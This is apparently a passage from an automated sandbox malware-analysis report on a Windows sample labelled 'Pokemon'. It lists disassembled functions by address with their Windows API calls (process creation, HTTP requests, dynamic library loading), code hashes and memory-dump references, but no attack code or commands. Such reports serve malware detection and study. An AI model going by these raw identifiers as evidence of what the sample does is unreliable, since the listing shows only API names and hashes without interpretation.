                                                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                      • Opcode ID: 8fa5477ad7dca929f6fcce620843a567e115289de90181917ede8479f7cb8dae
                                                                                                                                                                                                                                                                                      • Instruction ID: 1a873dda3c38b9d27367153f058f14701b2d35e61445360bb99eeed56f7de354
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fa5477ad7dca929f6fcce620843a567e115289de90181917ede8479f7cb8dae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0321D872A447147BD7716BA4FC06BEB37D4EB08BA2F144125F905A7E90DFB09C818A51
                                                                                                                                                                                                                                                                                      Function 000F3A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                      • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                      • Opcode ID: 67c69bff5491d5b2ebfc89172383e4b86c31c729d705e031f3808caac123e7a2
                                                                                                                                                                                                                                                                                      • Instruction ID: 071e5b7ae385e3b8dfc02d2d3669ee59218eb26bb651ebeb09d96787517ee7be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67c69bff5491d5b2ebfc89172383e4b86c31c729d705e031f3808caac123e7a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E1F331A0051ADBCB649FB4C8516FDFBB0BF44720F504129EA56F7681DB30AE89A7D0
                                                                                                                                                                                                                                                                                      Function 00104F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,0012DCD0), ref: 00104F6C
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00104F80
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00104FDE
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00105039
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00105084
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001050EC
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AFD52: _wcslen.LIBCMT ref: 000AFD5D
                                                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00157C10,00000061), ref: 00105188
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                      • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                      • Opcode ID: a996f0916c16851968683a3fabc113f7da33116b9ad5531a7e6fcdab8031352e
                                                                                                                                                                                                                                                                                      • Instruction ID: 65acd15ed7c8e0031f474c8dd7ad66e2cb75d3471f0d1a392bf34f63ef4a14be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a996f0916c16851968683a3fabc113f7da33116b9ad5531a7e6fcdab8031352e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9B1D1316087029FC714EF28D890AAFB7E6AFA4720F50491DF5D6872D6DBB0D844CB92
                                                                                                                                                                                                                                                                                      Function 0011BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011BBF8
                                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC10
                                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC34
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011BC60
                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC74
                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0011BC96
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011BD92
                                                                                                                                                                                                                                                                                        • Part of subcall function 00100F4E: GetStdHandle.KERNEL32(000000F6), ref: 00100F6D
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011BDAB
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011BDC6
                                                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0011BE16
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0011BE67
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0011BE99
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011BEAA
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011BEBC
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011BECE
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0011BF43
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5375a5fab14f89dd9f7ebc83d661194f0f0b92a37652bdc6c87078ee1e4497c5
                                                                                                                                                                                                                                                                                      • Instruction ID: a2013078fcb0e0ca7be35320b880ba3a0d3d3fbcef42810d4ea1183d0dc10f18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5375a5fab14f89dd9f7ebc83d661194f0f0b92a37652bdc6c87078ee1e4497c5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21F1A371508300DFCB18EF24C891BAABBE1BF85314F14856DF8859B2A2DB71DD85CB52
                                                                                                                                                                                                                                                                                      Function 00114A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0012DCD0), ref: 00114B18
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00114B2A
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0012DCD0), ref: 00114B4F
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,0012DCD0), ref: 00114B9B
                                                                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,0012DCD0), ref: 00114C05
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 00114CBF
                                                                                                                                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00114D25
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00114D4F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                      • Opcode ID: b29ce8bfd664067b988bdfbcad760e6923cb29a1562229fb6ecbc420c7805df1
                                                                                                                                                                                                                                                                                      • Instruction ID: 204df974136ce5079db5c35cb7d4f3da7bc523c20cb00e84cb37964e2116cf2b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b29ce8bfd664067b988bdfbcad760e6923cb29a1562229fb6ecbc420c7805df1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F122975A00115EFDB18CF94C884EAEB7B5FF45714F2580A8F909AB251D731ED86CBA0
                                                                                                                                                                                                                                                                                      Function 0009381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(001629C0), ref: 000D3F72
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(001629C0), ref: 000D4022
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 000D4066
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 000D406F
                                                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(001629C0,00000000,?,00000000,00000000,00000000), ref: 000D4082
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000D408E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: b8ad6b1f3a78a0883cb4a72675cb4cac437dd83ee7ec746476056c059dea9828
                                                                                                                                                                                                                                                                                      • Instruction ID: 4cc824b2b701e05b6fdc24bc98f96e33f81fe94b6be59be18e39dee09125dac1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8ad6b1f3a78a0883cb4a72675cb4cac437dd83ee7ec746476056c059dea9828
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1571E631A44319BFEB319F29DC49FAABFA5FF04364F200216F614A62D1C7B19960DB61
                                                                                                                                                                                                                                                                                      Function 00127711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 00127823
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00127897
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001278B9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001278CC
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 001278ED
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00090000,00000000), ref: 0012791C
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00127935
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0012794E
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00127955
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0012796D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00127985
                                                                                                                                                                                                                                                                                        • Part of subcall function 00092234: GetWindowLongW.USER32(?,000000EB), ref: 00092242
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                      • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e5fb9d1b3ce6bdbe2067c7753a2769d324b827ec77a0f14ec3a97e654d707db
                                                                                                                                                                                                                                                                                      • Instruction ID: 1663e55754da0835e6da079edd73735c6f46a7b7410743bd3a47f7ea6459fccc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e5fb9d1b3ce6bdbe2067c7753a2769d324b827ec77a0f14ec3a97e654d707db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04717870105354AFDB25CF18EC48F6BBBF9EB89318F04441DF985872A1C770A9A6DB11
                                                                                                                                                                                                                                                                                      Function 00129B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00129BA3
                                                                                                                                                                                                                                                                                        • Part of subcall function 001280AE: ClientToScreen.USER32(?,?), ref: 001280D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 001280AE: GetWindowRect.USER32(?,?), ref: 0012814A
                                                                                                                                                                                                                                                                                        • Part of subcall function 001280AE: PtInRect.USER32(?,?,?), ref: 0012815A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00129C0C
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00129C17
                                                                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00129C3A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00129C81
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00129C9A
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00129CB1
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00129CD3
                                                                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00129CDA
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00129DCD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                      • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                      • Opcode ID: f5f0550aa6c55fe97dd1f5236e0bac2198e0f26c7ef73eb544e6b85ba7adb5a8
                                                                                                                                                                                                                                                                                      • Instruction ID: b67e99abf0fbee32b43dea367bd2701a6a41bfcec139dcbdf01eb571b0c50f58
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5f0550aa6c55fe97dd1f5236e0bac2198e0f26c7ef73eb544e6b85ba7adb5a8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72617971108345AFC701EF64EC85DAFBBE8EF88750F40092EF595921A1DB70AA59CB52
                                                                                                                                                                                                                                                                                      Function 0010CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0010CEF5
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0010CF08
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0010CF1C
                                                                                                                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0010CF35
                                                                                                                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0010CF78
                                                                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0010CF8E
                                                                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0010CF99
                                                                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0010CFC9
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0010D021
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0010D035
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0010D040
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: 7bc5b248cdcc4ac8af88c9a97a9b8d541ac6053ead7564278a3b004f2fa34997
                                                                                                                                                                                                                                                                                      • Instruction ID: 2eb2265e55cc79cf7011ce684633db24add73e5bf3cc36b9d1803ef979228b1b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bc5b248cdcc4ac8af88c9a97a9b8d541ac6053ead7564278a3b004f2fa34997
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7851A1B1500605BFDB219FA0EC88AAB7BFCFF08344F008519F98586690D774D956DBA1
                                                                                                                                                                                                                                                                                      Function 00128FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001266D6,?,?), ref: 00128FEE
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00128FFE
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129009
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129016
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00129024
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129033
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0012903C
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129043
                                                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001266D6,?,?,00000000,?), ref: 00129054
                                                                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00130C04,?), ref: 0012906D
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0012907D
                                                                                                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0012909D
                                                                                                                                                                                                                                                                                      • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 001290CD
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 001290F5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0012910B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
